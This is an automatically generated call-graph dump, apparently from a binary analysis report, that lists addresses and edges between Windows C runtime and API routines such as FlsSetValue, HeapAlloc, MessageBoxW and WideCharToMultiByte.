16508 7ff78da6b456 16509 7ff78da6b474 FlsSetValue 16508->16509 16510 7ff78da6b464 FlsSetValue 16508->16510 16512 7ff78da6b492 16509->16512 16513 7ff78da6b480 FlsSetValue 16509->16513 16511 7ff78da6b46d 16510->16511 16525 7ff78da6a9b8 16511->16525 16531 7ff78da6af64 16512->16531 16513->16511 16519 7ff78da6ec19 memcpy_s 16518->16519 16520 7ff78da6ec4e HeapAlloc 16519->16520 16521 7ff78da6ec6a 16519->16521 16536 7ff78da73600 16519->16536 16520->16519 16523 7ff78da6ec68 16520->16523 16539 7ff78da64f78 16521->16539 16523->16508 16526 7ff78da6a9bd RtlFreeHeap 16525->16526 16530 7ff78da6a9ec 16525->16530 16527 7ff78da6a9d8 GetLastError 16526->16527 16526->16530 16528 7ff78da6a9e5 __free_lconv_num 16527->16528 16529 7ff78da64f78 memcpy_s 9 API calls 16528->16529 16529->16530 16530->16507 16565 7ff78da6ae3c 16531->16565 16542 7ff78da73640 16536->16542 16548 7ff78da6b338 GetLastError 16539->16548 16541 7ff78da64f81 16541->16523 16547 7ff78da70348 EnterCriticalSection 16542->16547 16549 7ff78da6b379 FlsSetValue 16548->16549 16554 7ff78da6b35c 16548->16554 16550 7ff78da6b38b 16549->16550 16553 7ff78da6b369 16549->16553 16552 7ff78da6ec08 memcpy_s 5 API calls 16550->16552 16551 7ff78da6b3e5 SetLastError 16551->16541 16555 7ff78da6b39a 16552->16555 16553->16551 16554->16549 16554->16553 16556 7ff78da6b3b8 FlsSetValue 16555->16556 16557 7ff78da6b3a8 FlsSetValue 16555->16557 16558 7ff78da6b3d6 16556->16558 16559 7ff78da6b3c4 FlsSetValue 16556->16559 16560 7ff78da6b3b1 16557->16560 16561 7ff78da6af64 memcpy_s 5 API calls 16558->16561 16559->16560 16562 7ff78da6a9b8 __free_lconv_num 5 API calls 16560->16562 16563 7ff78da6b3de 16561->16563 16562->16553 16564 7ff78da6a9b8 __free_lconv_num 5 API calls 16563->16564 16564->16551 16577 7ff78da70348 EnterCriticalSection 16565->16577 16580 7ff78da6a6be _isindst memcpy_s 16579->16580 16581 7ff78da6a6e6 RtlCaptureContext RtlLookupFunctionEntry 16580->16581 16582 7ff78da6a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16581->16582 16583 7ff78da6a720 RtlVirtualUnwind 16581->16583 16586 7ff78da6a7a8 _isindst 16582->16586 16583->16582 16584 7ff78da5c5c0 _log10_special 8 API calls 16585 7ff78da6a7c7 GetCurrentProcess TerminateProcess 16584->16585 16586->16584 16589 7ff78da536bc GetModuleFileNameW 16588->16589 16589->16162 16589->16163 16591 7ff78da5932f FindClose 16590->16591 16592 7ff78da59342 16590->16592 16591->16592 16593 7ff78da5c5c0 _log10_special 8 API calls 16592->16593 16594 7ff78da5371a 16593->16594 16594->16167 16594->16168 16596 7ff78da5c8c0 16595->16596 16597 7ff78da52c70 GetCurrentProcessId 16596->16597 16626 7ff78da526b0 16597->16626 16599 7ff78da52cb9 16630 7ff78da64c48 16599->16630 16602 7ff78da526b0 48 API calls 16603 7ff78da52d34 FormatMessageW 16602->16603 16605 7ff78da52d6d 16603->16605 16606 7ff78da52d7f MessageBoxW 16603->16606 16607 7ff78da526b0 48 API calls 16605->16607 16608 7ff78da5c5c0 _log10_special 8 API calls 16606->16608 16607->16606 16609 7ff78da52daf 16608->16609 16609->16178 16611 7ff78da53730 16610->16611 16612 7ff78da593b0 GetFinalPathNameByHandleW CloseHandle 16610->16612 16611->16175 16611->16180 16612->16611 16614 7ff78da52834 16613->16614 16615 7ff78da526b0 48 API calls 16614->16615 16616 7ff78da52887 16615->16616 16617 7ff78da64c48 48 API calls 16616->16617 16618 7ff78da528d0 MessageBoxW 16617->16618 16619 7ff78da5c5c0 _log10_special 8 API calls 16618->16619 16620 7ff78da52900 16619->16620 16620->16178 16622 7ff78da594da WideCharToMultiByte 16621->16622 16623 7ff78da59505 16621->16623 16622->16623 16625 7ff78da5951b __std_exception_destroy 16622->16625 16624 7ff78da59522 WideCharToMultiByte 16623->16624 16623->16625 16624->16625 16625->16174 16627 7ff78da526d5 16626->16627 16628 7ff78da64c48 48 API calls 16627->16628 16629 7ff78da526f8 16628->16629 16629->16599 16631 7ff78da64ca2 16630->16631 16632 7ff78da64cc7 16631->16632 16633 7ff78da64d03 16631->16633 16634 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16632->16634 16648 7ff78da63000 16633->16648 16636 7ff78da64cf1 16634->16636 16639 7ff78da5c5c0 _log10_special 8 API calls 16636->16639 16637 7ff78da64de4 16638 7ff78da6a9b8 __free_lconv_num 11 API calls 16637->16638 16638->16636 16641 7ff78da52d04 16639->16641 16641->16602 16642 7ff78da64e0a 16642->16637 16645 7ff78da64e14 16642->16645 16643 7ff78da64db9 16646 7ff78da6a9b8 __free_lconv_num 11 API calls 16643->16646 16644 7ff78da64db0 16644->16637 16644->16643 16647 7ff78da6a9b8 __free_lconv_num 11 API calls 16645->16647 16646->16636 16647->16636 16649 7ff78da6303e 16648->16649 16650 7ff78da6302e 16648->16650 16651 7ff78da63047 16649->16651 16656 7ff78da63075 16649->16656 16652 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16650->16652 16653 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16651->16653 16654 7ff78da6306d 16652->16654 16653->16654 16654->16637 16654->16642 16654->16643 16654->16644 16656->16650 16656->16654 16659 7ff78da63a14 16656->16659 16692 7ff78da63460 16656->16692 16729 7ff78da62bf0 16656->16729 16660 7ff78da63ac7 16659->16660 16661 7ff78da63a56 16659->16661 16664 7ff78da63acc 16660->16664 16665 7ff78da63b20 16660->16665 16662 7ff78da63a5c 16661->16662 16663 7ff78da63af1 16661->16663 16666 7ff78da63a90 16662->16666 16667 7ff78da63a61 16662->16667 16752 7ff78da61dc4 16663->16752 16668 7ff78da63ace 16664->16668 16669 7ff78da63b01 16664->16669 16671 7ff78da63b37 16665->16671 16673 7ff78da63b2a 16665->16673 16677 7ff78da63b2f 16665->16677 16674 7ff78da63a67 16666->16674 16666->16677 16667->16671 16667->16674 16672 7ff78da63a70 16668->16672 16681 7ff78da63add 16668->16681 16759 7ff78da619b4 16669->16759 16766 7ff78da6471c 16671->16766 16690 7ff78da63b60 16672->16690 16732 7ff78da641c8 16672->16732 16673->16663 16673->16677 16674->16672 16680 7ff78da63aa2 16674->16680 16688 7ff78da63a8b 16674->16688 16677->16690 16770 7ff78da621d4 16677->16770 16680->16690 16742 7ff78da64504 16680->16742 16681->16663 16682 7ff78da63ae2 16681->16682 16682->16690 16748 7ff78da645c8 16682->16748 16684 7ff78da5c5c0 _log10_special 8 API calls 16685 7ff78da63e5a 16684->16685 16685->16656 16688->16690 16691 7ff78da63d4c 16688->16691 16777 7ff78da64830 16688->16777 16690->16684 16691->16690 16783 7ff78da6ea78 16691->16783 16693 7ff78da6346e 16692->16693 16694 7ff78da63484 16692->16694 16696 7ff78da634c4 16693->16696 16697 7ff78da63ac7 16693->16697 16698 7ff78da63a56 16693->16698 16695 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16694->16695 16694->16696 16695->16696 16696->16656 16701 7ff78da63acc 16697->16701 16702 7ff78da63b20 16697->16702 16699 7ff78da63a5c 16698->16699 16700 7ff78da63af1 16698->16700 16703 7ff78da63a90 16699->16703 16704 7ff78da63a61 16699->16704 16707 7ff78da61dc4 38 API calls 16700->16707 16705 7ff78da63ace 16701->16705 16706 7ff78da63b01 16701->16706 16708 7ff78da63b37 16702->16708 16710 7ff78da63b2a 16702->16710 16714 7ff78da63b2f 16702->16714 16711 7ff78da63a67 16703->16711 16703->16714 16704->16708 16704->16711 16709 7ff78da63a70 16705->16709 16717 7ff78da63add 16705->16717 16712 7ff78da619b4 38 API calls 16706->16712 16724 7ff78da63a8b 16707->16724 16715 7ff78da6471c 45 API calls 16708->16715 16713 7ff78da641c8 47 API calls 16709->16713 16727 7ff78da63b60 16709->16727 16710->16700 16710->16714 16711->16709 16718 7ff78da63aa2 16711->16718 16711->16724 16712->16724 16713->16724 16716 7ff78da621d4 38 API calls 16714->16716 16714->16727 16715->16724 16716->16724 16717->16700 16719 7ff78da63ae2 16717->16719 16720 7ff78da64504 46 API calls 16718->16720 16718->16727 16722 7ff78da645c8 37 API calls 16719->16722 16719->16727 16720->16724 16721 7ff78da5c5c0 _log10_special 8 API calls 16723 7ff78da63e5a 16721->16723 16722->16724 16723->16656 16725 7ff78da64830 45 API calls 16724->16725 16724->16727 16728 7ff78da63d4c 16724->16728 16725->16728 16726 7ff78da6ea78 46 API calls 16726->16728 16727->16721 16728->16726 16728->16727 17009 7ff78da61038 16729->17009 16733 7ff78da641ee 16732->16733 16795 7ff78da60bf0 16733->16795 16738 7ff78da64830 45 API calls 16741 7ff78da64333 16738->16741 16739 7ff78da643c1 16739->16688 16739->16739 16740 7ff78da64830 45 API calls 16740->16739 16741->16739 16741->16740 16741->16741 16745 7ff78da64539 16742->16745 16743 7ff78da6457e 16743->16688 16744 7ff78da64557 16747 7ff78da6ea78 46 API calls 16744->16747 16745->16743 16745->16744 16746 7ff78da64830 45 API calls 16745->16746 16746->16744 16747->16743 16751 7ff78da645e9 16748->16751 16749 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16750 7ff78da6461a 16749->16750 16750->16688 16751->16749 16751->16750 16754 7ff78da61df7 16752->16754 16753 7ff78da61e26 16758 7ff78da61e63 16753->16758 16941 7ff78da60c98 16753->16941 16754->16753 16756 7ff78da61ee3 16754->16756 16757 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16756->16757 16757->16758 16758->16688 16760 7ff78da619e7 16759->16760 16761 7ff78da61a16 16760->16761 16763 7ff78da61ad3 16760->16763 16762 7ff78da60c98 12 API calls 16761->16762 16765 7ff78da61a53 16761->16765 16762->16765 16764 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16763->16764 16764->16765 16765->16688 16767 7ff78da6475f 16766->16767 16769 7ff78da64763 __crtLCMapStringW 16767->16769 16949 7ff78da647b8 16767->16949 16769->16688 16771 7ff78da62207 16770->16771 16772 7ff78da62236 16771->16772 16775 7ff78da622f3 16771->16775 16773 7ff78da62273 16772->16773 16774 7ff78da60c98 12 API calls 16772->16774 16773->16688 16774->16773 16776 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16775->16776 16776->16773 16778 7ff78da64847 16777->16778 16953 7ff78da6da28 16778->16953 16785 7ff78da6eaa9 16783->16785 16793 7ff78da6eab7 16783->16793 16784 7ff78da6ead7 16787 7ff78da6eae8 16784->16787 16788 7ff78da6eb0f 16784->16788 16785->16784 16786 7ff78da64830 45 API calls 16785->16786 16785->16793 16786->16784 16999 7ff78da70110 16787->16999 16790 7ff78da6eb39 16788->16790 16791 7ff78da6eb9a 16788->16791 16788->16793 16790->16793 17002 7ff78da6f910 16790->17002 16792 7ff78da6f910 _fread_nolock MultiByteToWideChar 16791->16792 16792->16793 16793->16691 16796 7ff78da60c27 16795->16796 16802 7ff78da60c16 16795->16802 16796->16802 16825 7ff78da6d66c 16796->16825 16799 7ff78da60c68 16800 7ff78da6a9b8 __free_lconv_num 11 API calls 16799->16800 16800->16802 16801 7ff78da6a9b8 __free_lconv_num 11 API calls 16801->16799 16803 7ff78da6e5e0 16802->16803 16804 7ff78da6e5fd 16803->16804 16805 7ff78da6e630 16803->16805 16806 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16804->16806 16805->16804 16807 7ff78da6e662 16805->16807 16816 7ff78da64311 16806->16816 16812 7ff78da6e775 16807->16812 16820 7ff78da6e6aa 16807->16820 16808 7ff78da6e867 16865 7ff78da6dacc 16808->16865 16810 7ff78da6e82d 16858 7ff78da6de64 16810->16858 16811 7ff78da6e7fc 16851 7ff78da6e144 16811->16851 16812->16808 16812->16810 16812->16811 16814 7ff78da6e7bf 16812->16814 16817 7ff78da6e7b5 16812->16817 16841 7ff78da6e374 16814->16841 16816->16738 16816->16741 16817->16810 16819 7ff78da6e7ba 16817->16819 16819->16811 16819->16814 16820->16816 16832 7ff78da6a514 16820->16832 16823 7ff78da6a970 _isindst 17 API calls 16824 7ff78da6e8c4 16823->16824 16826 7ff78da6d6b7 16825->16826 16831 7ff78da6d67b memcpy_s 16825->16831 16827 7ff78da64f78 memcpy_s 11 API calls 16826->16827 16829 7ff78da60c54 16827->16829 16828 7ff78da6d69e HeapAlloc 16828->16829 16828->16831 16829->16799 16829->16801 16830 7ff78da73600 memcpy_s 2 API calls 16830->16831 16831->16826 16831->16828 16831->16830 16833 7ff78da6a52b 16832->16833 16834 7ff78da6a521 16832->16834 16835 7ff78da64f78 memcpy_s 11 API calls 16833->16835 16834->16833 16839 7ff78da6a546 16834->16839 16836 7ff78da6a532 16835->16836 16874 7ff78da6a950 16836->16874 16838 7ff78da6a53e 16838->16816 16838->16823 16839->16838 16840 7ff78da64f78 memcpy_s 11 API calls 16839->16840 16840->16836 16877 7ff78da7411c 16841->16877 16845 7ff78da6e41c 16846 7ff78da6e420 16845->16846 16847 7ff78da6e471 16845->16847 16849 7ff78da6e43c 16845->16849 16846->16816 16930 7ff78da6df60 16847->16930 16926 7ff78da6e21c 16849->16926 16852 7ff78da7411c 38 API calls 16851->16852 16853 7ff78da6e18e 16852->16853 16854 7ff78da73b64 37 API calls 16853->16854 16855 7ff78da6e1de 16854->16855 16856 7ff78da6e1e2 16855->16856 16857 7ff78da6e21c 45 API calls 16855->16857 16856->16816 16857->16856 16859 7ff78da7411c 38 API calls 16858->16859 16860 7ff78da6deaf 16859->16860 16861 7ff78da73b64 37 API calls 16860->16861 16862 7ff78da6df07 16861->16862 16863 7ff78da6df0b 16862->16863 16864 7ff78da6df60 45 API calls 16862->16864 16863->16816 16864->16863 16866 7ff78da6db44 16865->16866 16867 7ff78da6db11 16865->16867 16868 7ff78da6db5c 16866->16868 16871 7ff78da6dbdd 16866->16871 16869 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16867->16869 16870 7ff78da6de64 46 API calls 16868->16870 16873 7ff78da6db3d memcpy_s 16869->16873 16870->16873 16872 7ff78da64830 45 API calls 16871->16872 16871->16873 16872->16873 16873->16816 16875 7ff78da6a7e8 _invalid_parameter_noinfo 37 API calls 16874->16875 16876 7ff78da6a969 16875->16876 16876->16838 16878 7ff78da7416f fegetenv 16877->16878 16879 7ff78da77e9c 37 API calls 16878->16879 16882 7ff78da741c2 16879->16882 16880 7ff78da741ef 16885 7ff78da6a514 __std_exception_copy 37 API calls 16880->16885 16881 7ff78da742b2 16883 7ff78da77e9c 37 API calls 16881->16883 16882->16881 16886 7ff78da7428c 16882->16886 16887 7ff78da741dd 16882->16887 16884 7ff78da742dc 16883->16884 16888 7ff78da77e9c 37 API calls 16884->16888 16889 7ff78da7426d 16885->16889 16890 7ff78da6a514 __std_exception_copy 37 API calls 16886->16890 16887->16880 16887->16881 16891 7ff78da742ed 16888->16891 16892 7ff78da75394 16889->16892 16896 7ff78da74275 16889->16896 16890->16889 16894 7ff78da78090 20 API calls 16891->16894 16893 7ff78da6a970 _isindst 17 API calls 16892->16893 16895 7ff78da753a9 16893->16895 16905 7ff78da74356 memcpy_s 16894->16905 16897 7ff78da5c5c0 _log10_special 8 API calls 16896->16897 16898 7ff78da6e3c1 16897->16898 16922 7ff78da73b64 16898->16922 16899 7ff78da746ff memcpy_s 16900 7ff78da74a3f 16902 7ff78da73c80 37 API calls 16900->16902 16901 7ff78da747f3 memcpy_s 16903 7ff78da749eb 16901->16903 16915 7ff78da64f78 11 API calls memcpy_s 16901->16915 16916 7ff78da6a950 37 API calls _invalid_parameter_noinfo 16901->16916 16906 7ff78da75157 16902->16906 16903->16900 16903->16903 16907 7ff78da753ac memcpy_s 37 API calls 16903->16907 16904 7ff78da74397 memcpy_s 16904->16901 16918 7ff78da74cdb memcpy_s 16904->16918 16905->16899 16905->16904 16908 7ff78da64f78 memcpy_s 11 API calls 16905->16908 16906->16906 16912 7ff78da753ac memcpy_s 37 API calls 16906->16912 16921 7ff78da751b2 16906->16921 16907->16900 16909 7ff78da747d0 16908->16909 16911 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 16909->16911 16910 7ff78da75338 16913 7ff78da77e9c 37 API calls 16910->16913 16911->16904 16912->16921 16913->16896 16914 7ff78da64f78 11 API calls memcpy_s 16914->16918 16915->16901 16916->16901 16917 7ff78da73c80 37 API calls 16917->16921 16918->16900 16918->16903 16918->16914 16919 7ff78da6a950 37 API calls _invalid_parameter_noinfo 16918->16919 16919->16918 16920 7ff78da753ac memcpy_s 37 API calls 16920->16921 16921->16910 16921->16917 16921->16920 16923 7ff78da73b83 16922->16923 16924 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16923->16924 16925 7ff78da73bae memcpy_s 16923->16925 16924->16925 16925->16845 16927 7ff78da6e248 memcpy_s 16926->16927 16928 7ff78da64830 45 API calls 16927->16928 16929 7ff78da6e302 memcpy_s 16927->16929 16928->16929 16929->16846 16931 7ff78da6df9b 16930->16931 16936 7ff78da6dfe8 memcpy_s 16930->16936 16932 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16931->16932 16933 7ff78da6dfc7 16932->16933 16933->16846 16934 7ff78da6e053 16935 7ff78da6a514 __std_exception_copy 37 API calls 16934->16935 16940 7ff78da6e095 memcpy_s 16935->16940 16936->16934 16937 7ff78da64830 45 API calls 16936->16937 16937->16934 16938 7ff78da6a970 _isindst 17 API calls 16939 7ff78da6e140 16938->16939 16940->16938 16942 7ff78da60cbe 16941->16942 16943 7ff78da60ccf 16941->16943 16942->16758 16943->16942 16944 7ff78da6d66c _fread_nolock 12 API calls 16943->16944 16945 7ff78da60d00 16944->16945 16946 7ff78da60d14 16945->16946 16947 7ff78da6a9b8 __free_lconv_num 11 API calls 16945->16947 16948 7ff78da6a9b8 __free_lconv_num 11 API calls 16946->16948 16947->16946 16948->16942 16950 7ff78da647de 16949->16950 16951 7ff78da647d6 16949->16951 16950->16769 16952 7ff78da64830 45 API calls 16951->16952 16952->16950 16954 7ff78da6486f 16953->16954 16955 7ff78da6da41 16953->16955 16957 7ff78da6da94 16954->16957 16955->16954 16961 7ff78da73374 16955->16961 16958 7ff78da6daad 16957->16958 16959 7ff78da6487f 16957->16959 16958->16959 16996 7ff78da726c0 16958->16996 16959->16691 16973 7ff78da6b1c0 GetLastError 16961->16973 16964 7ff78da733ce 16964->16954 16974 7ff78da6b1e4 FlsGetValue 16973->16974 16975 7ff78da6b201 FlsSetValue 16973->16975 16976 7ff78da6b1fb 16974->16976 16977 7ff78da6b1f1 16974->16977 16975->16977 16978 7ff78da6b213 16975->16978 16976->16975 16979 7ff78da6b26d SetLastError 16977->16979 16980 7ff78da6ec08 memcpy_s 11 API calls 16978->16980 16981 7ff78da6b28d 16979->16981 16982 7ff78da6b27a 16979->16982 16983 7ff78da6b222 16980->16983 16984 7ff78da6a574 _CreateFrameInfo 38 API calls 16981->16984 16982->16964 16995 7ff78da70348 EnterCriticalSection 16982->16995 16985 7ff78da6b240 FlsSetValue 16983->16985 16986 7ff78da6b230 FlsSetValue 16983->16986 16987 7ff78da6b292 16984->16987 16989 7ff78da6b25e 16985->16989 16990 7ff78da6b24c FlsSetValue 16985->16990 16988 7ff78da6b239 16986->16988 16992 7ff78da6a9b8 __free_lconv_num 11 API calls 16988->16992 16991 7ff78da6af64 memcpy_s 11 API calls 16989->16991 16990->16988 16993 7ff78da6b266 16991->16993 16992->16977 16994 7ff78da6a9b8 __free_lconv_num 11 API calls 16993->16994 16994->16979 16997 7ff78da6b1c0 _CreateFrameInfo 45 API calls 16996->16997 16998 7ff78da726c9 16997->16998 17005 7ff78da76df8 16999->17005 17004 7ff78da6f919 MultiByteToWideChar 17002->17004 17008 7ff78da76e5c 17005->17008 17006 7ff78da5c5c0 _log10_special 8 API calls 17007 7ff78da7012d 17006->17007 17007->16793 17008->17006 17010 7ff78da6106d 17009->17010 17011 7ff78da6107f 17009->17011 17012 7ff78da64f78 memcpy_s 11 API calls 17010->17012 17014 7ff78da6108d 17011->17014 17017 7ff78da610c9 17011->17017 17013 7ff78da61072 17012->17013 17015 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17013->17015 17016 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17014->17016 17023 7ff78da6107d 17015->17023 17016->17023 17018 7ff78da61445 17017->17018 17020 7ff78da64f78 memcpy_s 11 API calls 17017->17020 17019 7ff78da64f78 memcpy_s 11 API calls 17018->17019 17018->17023 17021 7ff78da616d9 17019->17021 17022 7ff78da6143a 17020->17022 17024 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17021->17024 17025 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17022->17025 17023->16656 17024->17023 17025->17018 17027 7ff78da60774 17026->17027 17054 7ff78da604d4 17027->17054 17029 7ff78da6078d 17029->16191 17066 7ff78da6042c 17030->17066 17034 7ff78da5c8c0 17033->17034 17035 7ff78da52930 GetCurrentProcessId 17034->17035 17036 7ff78da51c80 49 API calls 17035->17036 17037 7ff78da52979 17036->17037 17080 7ff78da649f4 17037->17080 17042 7ff78da51c80 49 API calls 17043 7ff78da529ff 17042->17043 17110 7ff78da52620 17043->17110 17046 7ff78da5c5c0 _log10_special 8 API calls 17047 7ff78da52a31 17046->17047 17047->16230 17049 7ff78da51b89 17048->17049 17050 7ff78da60189 17048->17050 17049->16229 17049->16230 17051 7ff78da64f78 memcpy_s 11 API calls 17050->17051 17052 7ff78da6018e 17051->17052 17053 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17052->17053 17053->17049 17055 7ff78da6053e 17054->17055 17056 7ff78da604fe 17054->17056 17055->17056 17058 7ff78da6054a 17055->17058 17057 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17056->17057 17059 7ff78da60525 17057->17059 17065 7ff78da654dc EnterCriticalSection 17058->17065 17059->17029 17067 7ff78da60456 17066->17067 17068 7ff78da51a20 17066->17068 17067->17068 17069 7ff78da60465 memcpy_s 17067->17069 17070 7ff78da604a2 17067->17070 17068->16199 17068->16200 17072 7ff78da64f78 memcpy_s 11 API calls 17069->17072 17079 7ff78da654dc EnterCriticalSection 17070->17079 17074 7ff78da6047a 17072->17074 17076 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17074->17076 17076->17068 17082 7ff78da64a4e 17080->17082 17081 7ff78da64a73 17083 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17081->17083 17082->17081 17084 7ff78da64aaf 17082->17084 17086 7ff78da64a9d 17083->17086 17119 7ff78da62c80 17084->17119 17087 7ff78da5c5c0 _log10_special 8 API calls 17086->17087 17089 7ff78da529c3 17087->17089 17088 7ff78da6a9b8 __free_lconv_num 11 API calls 17088->17086 17098 7ff78da651d0 17089->17098 17091 7ff78da64bb0 17094 7ff78da64b8c 17091->17094 17095 7ff78da64bba 17091->17095 17092 7ff78da64b61 17096 7ff78da6a9b8 __free_lconv_num 11 API calls 17092->17096 17093 7ff78da64b58 17093->17092 17093->17094 17094->17088 17097 7ff78da6a9b8 __free_lconv_num 11 API calls 17095->17097 17096->17086 17097->17086 17099 7ff78da6b338 memcpy_s 11 API calls 17098->17099 17100 7ff78da651e7 17099->17100 17101 7ff78da6ec08 memcpy_s 11 API calls 17100->17101 17102 7ff78da65227 17100->17102 17107 7ff78da529e5 17100->17107 17103 7ff78da6521c 17101->17103 17102->17107 17257 7ff78da6ec90 17102->17257 17104 7ff78da6a9b8 __free_lconv_num 11 API calls 17103->17104 17104->17102 17107->17042 17108 7ff78da6a970 _isindst 17 API calls 17109 7ff78da6526c 17108->17109 17111 7ff78da5262f 17110->17111 17112 7ff78da59400 2 API calls 17111->17112 17113 7ff78da52660 17112->17113 17114 7ff78da52683 MessageBoxA 17113->17114 17115 7ff78da5266f MessageBoxW 17113->17115 17116 7ff78da52690 17114->17116 17115->17116 17117 7ff78da5c5c0 _log10_special 8 API calls 17116->17117 17118 7ff78da526a0 17117->17118 17118->17046 17120 7ff78da62cbe 17119->17120 17121 7ff78da62cae 17119->17121 17122 7ff78da62cc7 17120->17122 17127 7ff78da62cf5 17120->17127 17125 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17121->17125 17123 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17122->17123 17124 7ff78da62ced 17123->17124 17124->17091 17124->17092 17124->17093 17124->17094 17125->17124 17126 7ff78da64830 45 API calls 17126->17127 17127->17121 17127->17124 17127->17126 17129 7ff78da62fa4 17127->17129 17133 7ff78da63610 17127->17133 17159 7ff78da632d8 17127->17159 17189 7ff78da62b60 17127->17189 17131 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17129->17131 17131->17121 17134 7ff78da636c5 17133->17134 17135 7ff78da63652 17133->17135 17138 7ff78da636ca 17134->17138 17139 7ff78da6371f 17134->17139 17136 7ff78da63658 17135->17136 17137 7ff78da636ef 17135->17137 17146 7ff78da6365d 17136->17146 17150 7ff78da6372e 17136->17150 17206 7ff78da61bc0 17137->17206 17140 7ff78da636cc 17138->17140 17141 7ff78da636ff 17138->17141 17139->17137 17139->17150 17157 7ff78da63688 17139->17157 17143 7ff78da6366d 17140->17143 17149 7ff78da636db 17140->17149 17213 7ff78da617b0 17141->17213 17158 7ff78da6375d 17143->17158 17192 7ff78da63f74 17143->17192 17146->17143 17148 7ff78da636a0 17146->17148 17146->17157 17148->17158 17202 7ff78da64430 17148->17202 17149->17137 17152 7ff78da636e0 17149->17152 17150->17158 17220 7ff78da61fd0 17150->17220 17154 7ff78da645c8 37 API calls 17152->17154 17152->17158 17153 7ff78da5c5c0 _log10_special 8 API calls 17155 7ff78da639f3 17153->17155 17154->17157 17155->17127 17157->17158 17227 7ff78da6e8c8 17157->17227 17158->17153 17160 7ff78da632f9 17159->17160 17161 7ff78da632e3 17159->17161 17164 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17160->17164 17165 7ff78da63337 17160->17165 17162 7ff78da636c5 17161->17162 17163 7ff78da63652 17161->17163 17161->17165 17168 7ff78da636ca 17162->17168 17169 7ff78da6371f 17162->17169 17166 7ff78da63658 17163->17166 17167 7ff78da636ef 17163->17167 17164->17165 17165->17127 17176 7ff78da6365d 17166->17176 17178 7ff78da6372e 17166->17178 17172 7ff78da61bc0 38 API calls 17167->17172 17170 7ff78da636cc 17168->17170 17171 7ff78da636ff 17168->17171 17169->17167 17169->17178 17187 7ff78da63688 17169->17187 17173 7ff78da6366d 17170->17173 17180 7ff78da636db 17170->17180 17174 7ff78da617b0 38 API calls 17171->17174 17172->17187 17175 7ff78da63f74 47 API calls 17173->17175 17186 7ff78da6375d 17173->17186 17174->17187 17175->17187 17176->17173 17177 7ff78da636a0 17176->17177 17176->17187 17181 7ff78da64430 47 API calls 17177->17181 17177->17186 17179 7ff78da61fd0 38 API calls 17178->17179 17178->17186 17179->17187 17180->17167 17182 7ff78da636e0 17180->17182 17181->17187 17184 7ff78da645c8 37 API calls 17182->17184 17182->17186 17183 7ff78da5c5c0 _log10_special 8 API calls 17185 7ff78da639f3 17183->17185 17184->17187 17185->17127 17186->17183 17187->17186 17188 7ff78da6e8c8 47 API calls 17187->17188 17188->17187 17240 7ff78da60d84 17189->17240 17193 7ff78da63f96 17192->17193 17194 7ff78da60bf0 12 API calls 17193->17194 17195 7ff78da63fde 17194->17195 17196 7ff78da6e5e0 46 API calls 17195->17196 17197 7ff78da640b1 17196->17197 17198 7ff78da64830 45 API calls 17197->17198 17199 7ff78da640d3 17197->17199 17198->17199 17199->17199 17200 7ff78da64830 45 API calls 17199->17200 17201 7ff78da6415c 17199->17201 17200->17201 17201->17157 17203 7ff78da64448 17202->17203 17205 7ff78da644b0 17202->17205 17204 7ff78da6e8c8 47 API calls 17203->17204 17203->17205 17204->17205 17205->17157 17207 7ff78da61bf3 17206->17207 17208 7ff78da61c22 17207->17208 17210 7ff78da61cdf 17207->17210 17209 7ff78da60bf0 12 API calls 17208->17209 17212 7ff78da61c5f 17208->17212 17209->17212 17211 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17210->17211 17211->17212 17212->17157 17214 7ff78da617e3 17213->17214 17215 7ff78da61812 17214->17215 17217 7ff78da618cf 17214->17217 17216 7ff78da60bf0 12 API calls 17215->17216 17219 7ff78da6184f 17215->17219 17216->17219 17218 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17217->17218 17218->17219 17219->17157 17221 7ff78da62003 17220->17221 17222 7ff78da62032 17221->17222 17224 7ff78da620ef 17221->17224 17223 7ff78da60bf0 12 API calls 17222->17223 17226 7ff78da6206f 17222->17226 17223->17226 17225 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17224->17225 17225->17226 17226->17157 17228 7ff78da6e8f0 17227->17228 17229 7ff78da6e935 17228->17229 17230 7ff78da64830 45 API calls 17228->17230 17231 7ff78da6e8f5 memcpy_s 17228->17231 17233 7ff78da6e91e memcpy_s 17228->17233 17229->17231 17229->17233 17237 7ff78da70858 17229->17237 17230->17229 17231->17157 17232 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17232->17231 17233->17231 17233->17232 17239 7ff78da7087c WideCharToMultiByte 17237->17239 17241 7ff78da60dc3 17240->17241 17242 7ff78da60db1 17240->17242 17244 7ff78da60e0d 17241->17244 17246 7ff78da60dd0 17241->17246 17243 7ff78da64f78 memcpy_s 11 API calls 17242->17243 17245 7ff78da60db6 17243->17245 17249 7ff78da60eb6 17244->17249 17250 7ff78da64f78 memcpy_s 11 API calls 17244->17250 17247 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17245->17247 17248 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17246->17248 17252 7ff78da60dc1 17247->17252 17248->17252 17251 7ff78da64f78 memcpy_s 11 API calls 